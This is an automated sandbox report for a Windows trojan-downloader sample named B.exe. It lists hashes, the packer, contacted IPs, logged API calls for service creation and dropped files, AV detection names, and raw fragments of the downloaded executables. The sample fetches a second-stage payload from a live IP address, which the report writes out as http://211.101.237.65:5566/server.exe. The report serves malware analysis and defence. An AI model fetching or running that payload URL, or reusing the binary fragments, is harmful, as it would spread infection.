Summary | ZeroBOX

B.exe

Malicious Library Antivirus UPX Malicious Packer PE64 PE File OS Processor Check PE32
Category Machine Started Completed
FILE s1_win7_x6401 April 22, 2023, 8:44 a.m. April 22, 2023, 9:02 a.m.
Size 281.6KB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 665d90fc3264e6f0b3a2b2e4fc715caf
SHA256 cd96e18da320ba4ac313d3a189776d7defbea7098cf53156b1e4b680eb9e4c68
CRC32 06B4B74C
ssdeep 6144:Ipb0nofW70cc6rX8aZAG7p4q5LmSVNR/XnzBvqi3TFRL9QolQ:Ipb/fk5iGVbgshDBvqijFvRlQ
Yara
  • IsPE32 - (no description)
  • PE_Header_Zero - PE File Signature

Name Response Post-Analysis Lookup
www.jz3366.top 211.101.237.65
IP Address Status Action
164.124.101.2 Active Moloch
211.101.237.65 Active Moloch

Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
section
packer NsPack 2.9 -> North Star
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2556
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01e00000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2556
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73552000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2672
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01d50000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2672
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73552000
process_handle: 0xffffffff
1 0 0
file C:\Windows\ServerName.reg
file C:\Program Files\Windows NT\win.exe
file C:\Windows\srvany.exe
file C:\Program Files\Windows NT\smss.exe
Time & API Arguments Status Return Repeated

CreateServiceA

service_start_name:
start_type: 3
password:
display_name: AdP19brT
filepath: C:\Users\test22\AppData\Local\Temp\AdP19brT.sys
service_name: AdP19brT
filepath_r: C:\Users\test22\AppData\Local\Temp\\AdP19brT.sys
desired_access: 16
service_handle: 0x0070a7d0
error_control: 0
service_type: 1
service_manager_handle: 0x0070a8c0
1 7382992 0
file C:\Users\test22\AppData\Local\Temp\7263406\TemporaryFile\TemporaryFile
Time & API Arguments Status Return Repeated

InternetReadFile

buffer: MZÿÿ¸@øº´ Í!¸LÍ!This program cannot be run in DOS mode. $*s$nJOnJOnJOíDOEJOX4@O¨JOFOmJO8 YOBJOnKOJO YOyJOX4AO0JO† AO>JO† @OwJOnJO'JO©LOoJORichnJOPELïe3dà  Ð $ä à @å~ á ,p GÐ `à à ¥š`àå €`à À $ä 21€jóâ ã ã $ã 3ã Aã Oã \ã kã …ã žã ­ã ¿ã Ïã º€€€áã òã L⠜à Yâ ¸à fâ Àà qâ Èà {â Ðà …â Øà ’â àà Ÿâ èà «â ðà µâ øà Ââ á Ïâ á Úâ á æâ á KERNEL32.DLLRASAPI32.DLLUSER32.DLLGDI32.DLLWINMM.DLLWINSPOOL.DRVADVAPI32.DLLSHELL32.DLLOLE32.DLLOLEAUT32.DLLCOMCTL32.DLLWS2_32.DLLWININET.DLLCOMDLG32.DLLLoadLibraryAGetProcAddressVirtualProtectVirtualAllocVirtualFreeExitProcessRasHangUpAGetCursorPosGetSystemPaletteEntrieswaveOutUnprepareHeaderClosePrinterRegCreateKeyExAShellExecuteACLSIDFromStringHttpQueryInfoAChooseColorA `6¹pò.žÃ~œ`è]¸+荵0üÿÿŠ<t‹õµXüÿÿŠ<„BÆ‹Õ+•ìûÿÿ‰•ìûÿÿ•üÿÿµ`üÿÿ`j@hhjÿ•„üÿÿ…À„j‰…üÿÿè[¹hÙPSè±a‹6‹ý½Üûÿÿ‹ßƒ?u ƒÇ¹ë¹;ƒÃƒ;t6‹3{WQRSÿµˆüÿÿÿµ„üÿÿ‹Ö‹Ï‹…üÿÿ©ÿÐ[ZY_ƒùtƒÃëÅh€jÿµüÿÿÿ•ˆüÿÿµüÿÿ‹NV‹6‹þƒùt?ŠG,è<w÷‹€ztŠ8uéŠ_fÁèÁÀ†Äë Š_†ÄÁÀ†Ä+ÇƉƒÇ€ëè‹ÃâÆè:0üÿÿ‹Aƒø„‹ò+qtz‰qµ`üÿÿ‹6^ü‹ƒøt ‹úy‹Ië‹þy‹I3ÀŠG Àt <ïwØ ëí$Áàf‹ƒÇ Àu닃Çëä3ۇþ‹ƒøt­ ÀtØf ëó3ÛÁé­ ÀtØf ëóµìûÿÿ‹µHüÿÿŠ<u?VVRVjhRÿ•€üÿÿ_^ƒø…½ƒÆ¹ó¤ƒî ƒïVÿvühWÿ•€üÿÿU[ë!3Ɋ €ùt(Cµìûÿÿ‹VQSRVÿ3ÿs‹CÂPÿ•€üÿÿZ[Y^ƒÃ âḃøt a¸ aé „øÿ‹µäûÿÿ ö„—‹•ìûÿÿòƒ>uƒ~uƒ~uëz‹^ÚSRV½(þÿÿ~ƒÆ Wÿ•xüÿÿ_Z[ƒøtY‰…ôûÿÿ>ƒÆ3ɊƒùuF볋ÇùRSP€8ÿu@‹%ÿÿÿŠÆQPÿµôûÿÿÿ•|üÿÿYZ[Zƒøtˆ‰FüÿvüƒÃFë´øÃéŸU‹ì‹u‹} ü²€¤èmsø3Éèds3Àè[s!°èRÀs÷uAªë×èPIâ‹ÅèDë.¬ÑètOƒÑ‹èë"‘HÁଋèè)=}s =sƒøwAAV‹÷+ðó¤^ëŽÒuŠFÒÃ3ÉAèîÿÿÿÉèçÿÿÿròÃ]Âjÿ•ŒüÿÿË;Qu ÇA8` ÿÊB‰À‹D$ƒ8ag V <ЃIÿjÖX^èÉs‹È ¶ÀÁâ ÂN‰|Auê^SV‹q3ۅÒWy ~,Uìê9Ñîã;þr+ЃË:îÅÀsÁæ5腉AçøMuØ]‰Îb_˜z^‹9Ã[gŒò.žÃW·9¸ÂÁèx <¯Ç~ ;øs@‰cF¼Àfë4п=à˜+úÁÿøf‰9~ÿP\‹Î)è*ŸNÈá:qufã¿rÀëB+ОøÛV‰® ÞÒ ÐÌÁꡞ¿†F„çþ>@_^ÃÖìQSv}Ú(…Ûèù~‰]ü€²U4áÌ >1è?ýÆÌMüuë^ÂB‹ËÓâ_[ É*:3v‰»ø90W‡ÿB9}“‹Ù÷Pü~ VÊxB è ½GÏ Óà EüG;H$|â6ˆHÉaÛò2èÚì@“nÈÓèϨ« Æp=’¾(|êŸV[ jPœ3Òü(RCÄ7u¸£Ðe°ÁîFžàLÃvG7è–s Û Ø;ðuûC@ÓëdW¶EèvEY‹Ø3渊ÅÊV‚úŽñèøA…À&u*Œ W¬jL0aZè܏1ë;N‹×ñ2P$WuÊK$DŒŸ"NµƒÀëjøŽB¢¤Ò,Ï|”8ù&Tœñ‚M ÈH3G¸áãHRzQÉÜיMôèQåͤÖf4KƒMø ì@ðäÓç6Z 2ÛJOÎ89M`UÀ.ÜsjXé á„˜vuÈÑón¨Ü^@þó«Éf ÿu@MÈèúüGŽ} †p¨]Š$#†3 ؃‰¼Á…fGÔô„ªÂ Œ›ÂNæUÄdDýŒvĂÜ#…G¥±*MÎA€Ã!¥GœŠ¡@  ;ƒÿÉl}eôë${ u=ïrÊ ¥ôÎ`t ’ös+`øšŠyˆUšAeþlïŽØçŠØÏT)jòC®~€i3„”è…bFÁ;á¯ÇÃd-:˜Fèž/£¦/uEIG%•ÑÁ F膜uX9î„j‹Uµ(ð>ÿÀ+#øD‚ †ùôÓrŠf3ÿJcˆéJHX°DF1u†Hìë'+VȊè.Ãðë uvÉäµp;ìm´ÛQæEÝ„Žh ‘2›UՄ™Åê#~H¹àýϲ #魄ˆ‰ðÙ[ä¶Ñ Ú„³,ˆdR2" 7èP—²øH´|˜}IXØ
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $Ô—eɵù6ɵù6ɵù6 º¦6ȵù6²©õ6ʵù6¦ªò6ȵù6J©÷6͵ù6¦ªó6µù6¦ªý6˵ù6ɵù6ȵù6 º¤6εù6ɵø6®µù6!ªò6õù6Richɵù6PEL|¾aà P R`@€Xdx.textLOP `.dataÌ` `@À
request_handle: 0x00cc000c
1 1 0
section {u'size_of_data': u'0x00046281', u'virtual_address': u'0x000d4000', u'entropy': 7.998450988803019, u'name': u'', u'virtual_size': u'0x00047000'} entropy 7.9984509888 description A section with a high entropy has been found
entropy 1.0 description Overall entropy of this PE file is high
process win.exe
Time & API Arguments Status Return Repeated

Process32NextW

snapshot_handle: 0x0000017c
process_name: sm& <
process_identifier: 2672
0 0

Process32NextW

snapshot_handle: 0x00000174
process_name: sm&v
process_identifier: 2672
0 0

Process32NextW

snapshot_handle: 0x0000017c
process_name: sm&°
process_identifier: 2672
0 0

Process32NextW

snapshot_handle: 0x00000174
process_name: sm'è
process_identifier: 2672
0 0

Process32NextW

snapshot_handle: 0x0000017c
process_name: sm& Ĥ
process_identifier: 2672
0 0

Process32NextW

snapshot_handle: 0x00000174
process_name: sm&ţ
process_identifier: 2672
0 0

Process32NextW

snapshot_handle: 0x0000017c
process_name: sm'ƛ
process_identifier: 2672
0 0

Process32NextW

snapshot_handle: 0x00000378
process_name: wiFȮ
process_identifier: 2812
0 0

Process32NextW

snapshot_handle: 0x00000370
process_name: wiJɊ
process_identifier: 2812
0 0

Process32NextW

snapshot_handle: 0x00000378
process_name: wiFɦ
process_identifier: 2812
0 0

Process32NextW

snapshot_handle: 0x00000370
process_name: wiFʁ
process_identifier: 2812
0 0

Process32NextW

snapshot_handle: 0x00000378
process_name: wiFʡ
process_identifier: 2812
0 0

Process32NextW

snapshot_handle: 0x00000370
process_name: wiJ˂
process_identifier: 2812
0 0

Process32NextW

snapshot_handle: 0x00000370
process_name: wiJ˼
process_identifier: 2812
0 0

Process32NextW

snapshot_handle: 0x00000378
process_name: wiF̘
process_identifier: 2812
0 0

Process32NextW

snapshot_handle: 0x00000370
process_name: wiJ̴
process_identifier: 2812
0 0

Process32NextW

snapshot_handle: 0x00000378
process_name: wiJ͏
process_identifier: 2812
0 0

Process32NextW

snapshot_handle: 0x00000370
process_name: wiJͯ
process_identifier: 2812
0 0

Process32NextW

snapshot_handle: 0x00000378
process_name: wiFΐ
process_identifier: 2812
0 0

Process32NextW

snapshot_handle: 0x00000378
process_name: wiFϊ
process_identifier: 2812
0 0

Process32NextW

snapshot_handle: 0x00000370
process_name: wiJϦ
process_identifier: 2812
0 0

Process32NextW

snapshot_handle: 0x00000378
process_name: wiFЂ
process_identifier: 2812
0 0

Process32NextW

snapshot_handle: 0x00000370
process_name: wiFН
process_identifier: 2812
0 0

Process32NextW

snapshot_handle: 0x00000378
process_name: wiFн
process_identifier: 2812
0 0

Process32NextW

snapshot_handle: 0x00000370
process_name: wiJў
process_identifier: 2812
0 0

Process32NextW

snapshot_handle: 0x00000370
process_name: wiJҘ
process_identifier: 2812
0 0

Process32NextW

snapshot_handle: 0x00000378
process_name: wiFҴ
process_identifier: 2812
0 0

Process32NextW

snapshot_handle: 0x00000370
process_name: wiJӐ
process_identifier: 2812
0 0

Process32NextW

snapshot_handle: 0x00000378
process_name: wiJӫ
process_identifier: 2812
0 0

Process32NextW

snapshot_handle: 0x00000370
process_name: wiJԋ
process_identifier: 2812
0 0

Process32NextW

snapshot_handle: 0x00000378
process_name: wiFԬ
process_identifier: 2812
0 0

Process32NextW

snapshot_handle: 0x00000378
process_name: wiFզ
process_identifier: 2812
0 0

Process32NextW

snapshot_handle: 0x00000370
process_name: wiJւ
process_identifier: 2812
0 0

Process32NextW

snapshot_handle: 0x00000378
process_name: wiF֞
process_identifier: 2812
0 0

Process32NextW

snapshot_handle: 0x00000370
process_name: wiFֹ
process_identifier: 2812
0 0

Process32NextW

snapshot_handle: 0x00000378
process_name: wiFי
process_identifier: 2812
0 0

Process32NextW

snapshot_handle: 0x00000370
process_name: wiJ׺
process_identifier: 2812
0 0

Process32NextW

snapshot_handle: 0x00000370
process_name: wiJش
process_identifier: 2812
0 0

Process32NextW

snapshot_handle: 0x00000378
process_name: wiFِ
process_identifier: 2812
0 0

Process32NextW

snapshot_handle: 0x00000370
process_name: wiJ٬
process_identifier: 2812
0 0

Process32NextW

snapshot_handle: 0x00000378
process_name: wiJڇ
process_identifier: 2812
0 0

Process32NextW

snapshot_handle: 0x00000370
process_name: wiJڧ
process_identifier: 2812
0 0

Process32NextW

snapshot_handle: 0x00000378
process_name: wiFۈ
process_identifier: 2812
0 0

Process32NextW

snapshot_handle: 0x00000378
process_name: wiF܂
process_identifier: 2812
0 0

Process32NextW

snapshot_handle: 0x00000370
process_name: wiJܞ
process_identifier: 2812
0 0

Process32NextW

snapshot_handle: 0x00000378
process_name: wiFܺ
process_identifier: 2812
0 0

Process32NextW

snapshot_handle: 0x00000370
process_name: wiFݕ
process_identifier: 2812
0 0

Process32NextW

snapshot_handle: 0x00000378
process_name: wiFݵ
process_identifier: 2812
0 0

Process32NextW

snapshot_handle: 0x00000370
process_name: wiJޖ
process_identifier: 2812
0 0

Process32NextW

snapshot_handle: 0x00000370
process_name: wiJߐ
process_identifier: 2812
0 0
reg_key HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ServerName\ImagePath reg_value C:\Windows\srvany.exe
Time & API Arguments Status Return Repeated

InternetCrackUrlA

url: http://211.101.237.65:5566/server.exe
flags: 0
1 1 0

InternetConnectA

username:
service: 3
hostname: 211.101.237.65
internet_handle: 0x00cc0004
flags: 0
password:
port: 5566
1 13369352 0

HttpOpenRequestA

connect_handle: 0x00cc0008
http_version: HTTP/1.0
flags: 2214592512
http_method: GET
referer:
path: /server.exe
1 13369356 0
service ServerName (regkey HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ServerName\Start)
Bkav W32.AIDetect.malware1
Lionic Trojan.Win32.Bjlog.lzuS
MicroWorld-eScan Gen:Variant.Graftor.945714
CAT-QuickHeal Trojan.Generic.2919
McAfee Artemis!665D90FC3264
Cylance unsafe
Zillya Virus.Hupigon.Win32.5
Sangfor Trojan.Win32.FlyStudio.Vaou
CrowdStrike win/malicious_confidence_70% (W)
Alibaba TrojanDownloader:Win32/FlyStudio.ae13fb70
K7GW Trojan ( 005257651 )
K7AntiVirus Trojan ( 005257651 )
Arcabit Trojan.Graftor.DE6E32
BitDefenderTheta Gen:NN.ZexaF.36164.rmGdayXyRTi
Cyren W32/Downloader.AT.gen!Eldorado
Symantec ML.Attribute.HighConfidence
Elastic malicious (high confidence)
ESET-NOD32 a variant of Win32/Packed.FlyStudio.AA potentially unwanted
Cynet Malicious (score: 100)
APEX Malicious
Paloalto generic.ml
Kaspersky Trojan.Win32.Siscos.acer
BitDefender Gen:Variant.Graftor.945714
NANO-Antivirus Trojan.Win32.Drop.jvoaam
Avast Win32:TrojanX-gen [Trj]
Tencent Win32.Trojan.Siscos.Mcnw
Emsisoft Gen:Variant.Graftor.945714 (B)
F-Secure Heuristic.HEUR/AGEN.1331417
VIPRE Gen:Variant.Graftor.945714
McAfee-GW-Edition BehavesLike.Win32.Generic.dc
Trapmine malicious.high.ml.score
FireEye Generic.mg.665d90fc3264e6f0
Sophos Mal/Generic-S
SentinelOne Static AI - Malicious PE
Jiangmin Trojan/StartPage.nxa
Avira HEUR/AGEN.1331417
MAX malware (ai score=82)
Antiy-AVL Trojan/Win32.FlyStudio.a
Gridinsoft Pack.Win32.Gen.bot!ep-44128
Xcitium Backdoor.Win32.Popwin.~IQ@ogvrk
Microsoft Trojan:Win32/Tiggre!rfn
ViRobot Trojan.Win.Z.Graftor.288385
ZoneAlarm Trojan.Win32.Siscos.acer
GData Gen:Variant.Graftor.945714
Google Detected
AhnLab-V3 Trojan/Win.Generic.C5229540
ALYac Gen:Variant.Graftor.945714
Malwarebytes Malware.Heuristic.1003
TrendMicro-HouseCall TROJ_GEN.R002H0CDJ23
Rising Trojan.Siscos!8.2A3A (CLOUD)